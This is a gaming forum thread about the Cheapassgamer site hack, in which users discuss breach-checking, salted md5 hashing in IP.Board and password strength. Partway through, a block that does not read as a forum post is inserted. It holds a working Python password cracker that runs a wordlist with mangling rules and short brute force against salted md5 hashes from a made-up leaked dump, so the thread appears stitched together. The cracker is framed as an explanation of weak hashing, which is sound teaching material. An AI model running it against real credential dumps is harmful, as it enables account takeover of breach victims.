
Cheapassgamer site hacked

shanafan

Member
I don't even remember ever creating Adobe and Moneybooker accounts. Why the HELL would I have one of those?

The website said Final Fantasy Shrine was breached, and my e-mail address was included.

I don't play Final Fantasy, so why would I go there?
 

sensi97

Member
About CheapyD's post
1) Your passwords are combined with a random set of characters and then hashed to create a unique fingerprint, and only this is stored in our database.
This is impossible to reverse engineer, so if you use your CAG password on other sites, they would not be compromised.

No. If a password is weak (CAG allow passwords with 3 characters), the hackers will find it (wordlist or bruteforce). Hash+salt doesn't protect weak passwords.
 

10k

Banned
My details have already leaked in (at least) 3 major hacks:



One can check their own email address at https://haveibeenpwned.com/
And it's possible to get notified automatically.


edit: entering my user name finds a 4th breach: Battlefield Heroes.
TOP KEK
Wow. Just checked as many of my emails and usernames as I can remember. I'm all green across the board. Lucky me.
 
About CheapyD's post


No. If a password is weak (CAG allow passwords with 3 characters), the hackers will find it (wordlist or bruteforce). Hash+salt doesn't protect weak passwords.

I did an experiment once. If your password is greater than 5 characters and you happen to have some sort of punctuation and/or a capital letter, it takes a LONG time to brute force. More so, on the order of several years, depending on how much hardware you are paying for/using. If the encryption was good, most users should generally be okay. Ouch at those who thought a 3 character passy was safe.
 
I did an experiment once. If your password is greater than 5 characters and you happen to have some sort of punctuation and/or a capital letter, it takes a LONG time to brute force. More so, on the order of several years, depending on how much hardware you are paying for/using. If the encryption was good, most users should generally be okay. Ouch at those who thought a 3 character passy was safe.
Well, password crackers generally don't go straight for simple brute force. They'll do dictionary attacks and then permutations (like $ instead of S, etc). A shorter password that's truly random is more secure than a password that's generated from one word, two words combined, a pattern on your keyboard, etc. In any case,
1) Your passwords are combined with a random set of characters and then hashed to create a unique fingerprint, and only this is stored in our database. This is impossible to reverse engineer, so if you use your CAG password on other sites, they would not be compromised.
is overstating it. Salts (the "random set of characters" your password is combined with) are stored somewhere on the DB, so if they got in, it's safe to assume they got the salts as well. It's not "impossible" to crack, just more difficult, and possibly not worth the time, depending on which hashing algorithm they used.
 

inm8num2

Member
Site and forums are working but the front page shows this:

 

thenexus6

Member
The CAG cast was the first podcast I ever listened to back in 2007 and never missed an episode since. And although I live in the UK so never really get deals from the site I visit the forums very regularly.

Shout out to John getting the site back up so soon.
 

ViciousDS

Banned
The remarks make it sound like a childish kid using scripts at this point to just intercept the IP to display his garbage message, which would explain why the main page actually loads sometimes and isn't always down.
 

low-G

Member
CAG uses IP.Board, and their documentation sez:

The salt is a random 5 character string that's stored in the same database table.

md5 is completely broken now, no one should be using it. Might be how the kid is logging in as web admin.

To be clear, there are MULTIPLE passwords which may log you into a CAG account, if they're using md5, and md5'ing 2 md5 concatenated elements seems like a flawed cryptography method even if it wasn't md5 (I cannot mathematically prove this right now, but my crypto senses are tingling, something about using an even number of discrete elements)

At the very least, consider CAG passwords compromised.
 

tebunker

Banned
It's funny though because the forums over there are just plugging along again.

I wonder what this cmd person actually did or got? Because I would have thought that if he really cared he would have shut it all down and shut out everything.
 

Chris1

Member
Yeah, salts and hashed passwords don't mean your passwords are secure lol.

It's more likely that they aren't cracking the hashes/salts exactly, but instead using a dictionary attack to bruteforce the password. So if you have a difficult password you should be fine but if you have a relatively easy password you're fucked.

Bad password: 123456 (Guaranteed to be leaked/bruteforced)
Bad but "looks good" password: Bob73873873899 (Not guaranteed but highly possible with a list generator)
Good password: Bob834kjs82'2$$"!##£$^& (virtually impossible within a reasonable timeframe)
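The point made in low-G's post above (a 5-character salt stored in the same table, two md5 digests concatenated and md5'd again) and in Chris1's post (crackers run a wordlist with mangling rules first, and only brute-force short passwords) can be shown together. The following Python is an added example, not code from this thread, from CAG or from Invision. It assumes the construction is md5(md5(salt) . md5(password)), which is how the thread describes IP.Board's scheme (the exact concatenation order is an assumption); the four leaked rows and the tiny wordlist are constructed for the example. With the salt in hand, the weak passwords fall to the dictionary pass or to a short brute force, and the long random one does not.

```python
"""Cracking salted md5 rows of the kind described in the thread.

Added example with constructed data. Hash construction assumed to be
md5(md5(salt) . md5(password)) with a 5-character salt stored beside the hash.
"""
import hashlib
import itertools
import string

# Constructed wordlist; a real attacker uses multi-million-entry lists.
WORDLIST = ["password", "letmein", "dragon", "cheap", "gamer", "final", "fantasy"]
# Leetspeak substitutions of the "$ instead of S" kind mentioned in the thread.
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def ipb_hash(salt: str, password: str) -> str:
    """Assumed IP.Board-style construction: md5(md5(salt) . md5(password))."""
    return md5_hex(md5_hex(salt) + md5_hex(password))


def mangle(word: str):
    """A few of the cheap rules crackers apply to each wordlist entry."""
    bases = {word, word.capitalize(), word.upper(),
             word.translate(LEET), word.translate(LEET).capitalize()}
    for base in sorted(bases):
        yield base
        for n in range(100):            # appended 0..99
            yield f"{base}{n}"
        for year in range(1970, 2016):  # appended birth/current years
            yield f"{base}{year}"


def crack_dictionary(salt: str, target: str, wordlist=WORDLIST):
    """Wordlist plus mangling. The salt is in the dump, so md5(salt) is computed once."""
    salt_md5 = md5_hex(salt)
    for word in wordlist:
        for cand in mangle(word):
            if md5_hex(salt_md5 + md5_hex(cand)) == target:
                return cand
    return None


def crack_short(salt: str, target: str, max_len: int = 3,
                alphabet: str = string.ascii_lowercase + string.digits):
    """Exhaust every password up to max_len over alphabet: 36^3 is only ~47k guesses."""
    salt_md5 = md5_hex(salt)
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            cand = "".join(chars)
            if md5_hex(salt_md5 + md5_hex(cand)) == target:
                return cand
    return None


def crack_row(row: dict):
    found = crack_dictionary(row["salt"], row["hash"])
    if found is None:
        found = crack_short(row["salt"], row["hash"])
    return found


# Constructed dump: per-user 5-character salts stored next to the hashes.
LEAKED_ROWS = [
    {"user": "alice", "salt": "q9Zk1", "hash": ipb_hash("q9Zk1", "Dragon2012")},
    {"user": "bob",   "salt": "Lm3xA", "hash": ipb_hash("Lm3xA", "ch3@p")},
    {"user": "carol", "salt": "8uWpR", "hash": ipb_hash("8uWpR", "x7q")},
    {"user": "dave",  "salt": "Tt0vE", "hash": ipb_hash("Tt0vE", "Bob834kjs82'2$$\"!##£$^&")},
]


def crack_all(rows=LEAKED_ROWS) -> dict:
    """Map each user to the recovered password, or None if neither pass found it."""
    return {row["user"]: crack_row(row) for row in rows}


if __name__ == "__main__":
    for user, pw in crack_all().items():
        print(f"{user}: {pw!r}" if pw is not None else f"{user}: not recovered")
```

The salt only stops precomputed tables and lets identical passwords hash differently across users; it adds nothing to the cost of each guess once the dump includes it, and a plain md5 (even nested) costs microseconds per guess, so the password's guessability is the only defence left. The mangling rules here are a small fraction of what a real cracker's rule set applies.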
 

Ehker

Member
Not sure if cache issue, but I keep refreshing and it seems like they keep fixing it for awhile, until it keeps getting reverted back to the hacked page.
 
These things are really annoying. Why do you have to hack a site or do something malicious because you think it is not secure enough?
It's not your problem, and it's not yours; you are just bothering a lot of people, thinking you are smart or doing them a favor, but you are not.

Leave cheapassgamers alone!!
 

TheSeks

Blinded by the luminous glory that is David Bowie's physical manifestation.
what's a jabber?

An Instant Messenger client, similar to AIM/YIM/MSN/ICQ but less popular.

Nexus6 said:
Shout out to John getting the site back up so soon.

I dunno about that...

"WHY ARE YOU BACK HERE!?" as a title, along with them putting the "child molester"'s e-mail out there, apparently?

md5 is completely broken now, no one should be using it. Might be how the kid is logging in as web admin.

Look at that Invision Board article: It's from 2010. So, not recent. It was only updated last in 2012.

That said, I'm wondering if they ever updated that code.
 
This sucks but luckily my password there is pseudo-random gibberish so I'm not really concerned. I'll just change it when they finally get the site fixed.
 